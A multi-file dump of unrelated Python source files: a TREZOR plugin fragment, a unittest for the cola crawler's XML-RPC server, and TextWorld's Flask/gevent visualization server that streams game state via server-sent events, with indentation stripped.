# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
test_rpc.py | '''
Copyright (c) 2013 Qin Xuye <qin@qinxuye.me>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Created on 2013-5-23
@author: Chine
'''
from __future__ import with_statement
import unittest
import xmlrpclib
import random
import socket
import threading
from cola.core.rpc import ColaRPCServer
def test_plus_one(num):
return num + 1
class Test(unittest.TestCase):
def client_call(self):
server = xmlrpclib.ServerProxy('http://localhost:11103')
num = random.randint(0, 100)
plus_one_num = server.test_plus_one(num)
self.assertEqual(plus_one_num, num + 1)
def start_server(self):
self.server = ColaRPCServer(('localhost', 11103))
self.server.register_function(test_plus_one)
self.server.serve_forever()
def setUp(self):
self.server_run = threading.Thread(target=self.start_server)
def testRPC(self):
self.server_run.start()
self.client_call()
self.server.shutdown()
del self.server
with self.assertRaises(socket.error):
self.client_call()
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main() |
serve.py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT license.
"""
Creates server for streamed game state
"""
import os
import json
import logging
import textwrap
from os.path import join as pjoin
from multiprocessing import Process, Pipe
from multiprocessing.connection import Connection
from threading import Thread
from queue import Queue
from textworld.core import GameState
from textworld.utils import check_modules
import textworld.render
# Try importing optional libraries.
missing_modules = []
try:
import webbrowser
except ImportError:
missing_modules.append("webbrowser")
try:
import flask
from flask import Flask, request
except ImportError:
missing_modules.append("flask")
try:
import gevent
from gevent import pywsgi
except ImportError:
missing_modules.append("gevent")
try:
import pybars
except ImportError:
missing_modules.append("pybars")
WEB_SERVER_RESOURCES = pjoin(os.path.abspath(os.path.dirname(__file__)), "tmpl")
def get_html_template(game_state=None):
check_modules(["pybars"], missing_modules)
# read in template
compiler = pybars.Compiler()
with open(pjoin(WEB_SERVER_RESOURCES, 'slideshow.handlebars'), 'r') as f:
contents = f.read()
template = compiler.compile(contents)
if game_state is None:
return template
html = template({
'game_state': game_state,
'template_path': WEB_SERVER_RESOURCES,
})
return html
class ServerSentEvent:
def __init__(self, data: any):
"""
Object helper to parse dict into SSE data.
:param data: data to pass to SSE
"""
self.data = data
self.event = None
self.id = None
self.desc_map = {
self.data: "data",
self.event: "event",
self.id: "id"
}
def encode(self):
if not self.data:
return ""
lines = ["%s: %s" % (v, k) for k, v in self.desc_map.items() if k]
return "%s\n\n" % "\n".join(lines)
class SupressStdStreams:
def __init__(self):
"""
for surpressing std.out streams
"""
self._null_fds = [os.open(os.devnull, os.O_RDWR) for _ in range(2)]
self._save_fds = [os.dup(1), os.dup(2)]
def __enter__(self):
os.dup2(self._null_fds[0], 1)
os.dup2(self._null_fds[1], 2)
def __exit__(self, *_):
os.dup2(self._save_fds[0], 1)
os.dup2(self._save_fds[1], 2)
for fd in self._null_fds + self._save_fds:
os.close(fd)
def find_free_port(port_range):
import socket
from contextlib import closing
for port in port_range:
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", port))
return s.getsockname()[1]
except socket.error:
continue
raise ValueError("Could not find any available port.")
class VisualizationService:
"""
Server for visualization.
We instantiate a new process for our flask server, so our game can send updates to
the server. The server instantiates new gevent Queues for every connection.
"""
def __init__(self, game_state: GameState, open_automatically: bool):
self.prev_state = None
self.command = None
self._process = None
state_dict = textworld.render.load_state_from_game_state(game_state)
self._history = '<p class="objective-text">{}</p>'.format(game_state.objective.strip().replace("\n", "<br/>"))
banner = textwrap.dedent(r"""
________ __ __
| \| \ _ | \
\$$$$$$$$| $$ / \ | $$
| $$ | $$/ $\| $$
| $$ | $$ $$$\ $$
| $$ | $$ $$\$$\$$
| $$ | $$$$ \$$$$
| $$ | $$$ \$$$
\$$ \$$ \$$
""") # noqa: W605
feedback = game_state.feedback.split(game_state.objective, 1)[-1]
initial_description = banner.replace(" ", " ") + feedback
self._history += '<p class="feedback-text">{}</p>'.format(initial_description.strip().replace("\n", "<br/>"))
state_dict["history"] = self._history
state_dict["command"] = ""
self.parent_conn, self.child_conn = Pipe()
self.game_state = state_dict
self.open_automatically = open_automatically
def start_server(self, game_state: dict, port: int, child_conn: Connection):
"""
function for starting new server on new process.
:param game_state: initial game state from load
:param port: port to run server
:param child_conn: child connection from multiprocessing.Pipe
"""
server = Server(game_state, port)
server.start(child_conn)
def start(self, parent_thread: Thread, port: int) -> None:
"""
Start visualization server on a new process.
:param parent_thread: the parent thread that called start.
:param port: Port to run visualization on.
"""
def wait_task():
parent_thread.join()
self.stop_server()
# Check if address is available.
self.port = find_free_port(range(port, port + 100))
self._process = Process(target=self.start_server, name='flask', args=(self.game_state, self.port, self.child_conn))
self._process.start()
thread = Thread(target=wait_task, name='waiting_on_parent_exit')
thread.start()
self.parent_conn.recv() # Wait until server is ready.
print("Viewer started at http://localhost:{}.".format(self.port))
if self.open_automatically:
check_modules(["webbrowser"], missing_modules)
with SupressStdStreams():
webbrowser.open("http://localhost:{}/".format(self.port))
def update_state(self, game_state: GameState, command: str):
"""
Propogate state update to server.
We use a multiprocessing.Pipe to pass state into flask process.
:param game_state: Glulx game state.
:param command: previous command
"""
state_dict = textworld.render.load_state_from_game_state(game_state)
self._history += '<p class="command-text">> {}</p>'.format(command)
self._history += '<p class="feedback-text">{}</p>'.format(game_state.feedback.strip().replace("\n", "<br/>"))
state_dict["command"] = command
state_dict["history"] = self._history
self.parent_conn.send(state_dict)
def stop_server(self):
self._process.terminate()
class Server:
"""
Visualization server.
Uses Server-sent Events to update game_state for visualization.
"""
def __init__(self, game_state: dict, port: int):
"""
Note: Flask routes are defined in app.add_url_rule in order to
call `self` in routes.
:param game_state: game state returned from load_state_from_game_state
:param port: port to run visualization on
"""
check_modules(["gevent", "flask"], missing_modules)
super().__init__()
# disabling loggers
log = logging.getLogger('werkzeug')
log.disabled = True
self.port = port
self.results = Queue()
self.subscribers = []
self.game_state = game_state
self.app = Flask(__name__, static_folder=pjoin(WEB_SERVER_RESOURCES, 'static'))
self.app.add_url_rule('/', 'index', self.index)
self.app.add_url_rule('/subscribe', 'subscribe', self.subscribe)
self.slideshow_template = get_html_template()
def start(self, child_conn: Connection):
""" Starts the WSGI server and listen for updates on a separate thread.
:param child_conn: Child connection from `multiprocessing.Pipe`.
"""
thread = Thread(target=self.listen, name='updates', args=(child_conn, self.results))
thread.start()
server = pywsgi.WSGIServer(("0.0.0.0", self.port), self.app, log=None)
server.serve_forever()
@staticmethod
def listen(conn: Connection, results: Queue):
"""
Listener for updates. Runs on separate thread.
:param conn: child connection from multiprocessing.Pipe.
:param results: thread-safe queue for results.
"""
conn.send("Ready!") # Tell the main thread the server is ready.
while True:
game_state = conn.recv()
results.put(game_state)
def update_subscribers(self, game_state: dict):
"""
Updates all subscribers and updates their data.
This is for multiple subscribers on the visualization service.
:param game_state: parsed game_state from load_state_from_game_state
"""
def notify():
self.game_state = game_state
if len(self.subscribers) == 0:
print("We have no subscribers!")
else:
for q in self.subscribers[:]:
q.put(game_state)
gevent.spawn(notify)
def index(self) -> str:
"""
Index route ("/").
Returns HTML template processed by handlebars.
:return: Flask response object
"""
output = self.slideshow_template({
'game_state': json.dumps(self.game_state),
'template_path': 'http://' + request.host
})
resp = flask.Response(output.encode('utf-8'))
resp.headers['Content-Type'] = 'text/html;charset=utf-8'
return resp
def gen(self):
"""
Our generator for listening for updating state.
We poll for results to return us something. If nothing is returned then we just pass
and keep polling.
:return: yields event-stream parsed data.
"""
q = gevent.queue.Queue()
self.subscribers.append(q)
try:
while True:
self.update_subscribers(self.results.get_nowait())
result = q.get()
ev = ServerSentEvent(json.dumps(result))
yield ev.encode()
except Exception:
pass
def subscribe(self):
"""
Our Server-sent Event stream route.
:return: A stream
"""
return flask.Response(self.gen(), mimetype='text/event-stream')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.